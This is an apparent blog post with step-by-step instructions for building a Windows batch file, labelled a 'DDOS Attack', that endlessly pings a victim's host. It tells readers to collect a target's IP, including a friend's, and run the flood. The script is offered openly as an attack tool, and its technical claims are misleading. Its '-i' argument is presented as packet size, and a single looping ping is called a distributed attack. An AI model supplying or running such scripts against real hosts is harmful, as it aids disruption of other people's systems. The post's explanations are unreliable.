Wednesday, June 26, 2013

How to make application DDOS (Distributed Denial of Service) with the help of a batch file ?

we need to do as followng..

1.Open Notepad

2.Copy this script into notepad
@echo off
mode 67,16
title DDOS Attack
color 05
cls
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo DDOS Bayu Ae
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
echo.
set /p x=Apa-Targer Loe:
echo.
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ping %x%
echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=Ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Serang Server %m%
ping %m% -i %n% -t >nul
goto DDOS

3.save as batchfile.
Exam:DDOS.bat

How to Use
----------

On-Target Server input menu
web address / Ip your friend that you want to DDOS
for example like this:

Right 2 click to open that batch file..

Get in victim site

get Victim IP

And then input the results of the ping IP in the host and
Packet Size for it to send the number of bytes to be
Size size up to you
then press "ENTER" result like this

if you like the picture above means the process of DDOS successfully on the run
you want to DDOS depending on how long.

NB: DO NOT use it carelessly IN
I AM NOT LIABLE IF THINGS DO NOT HAPPEN IN THE INTENDED 

No comments:

Post a Comment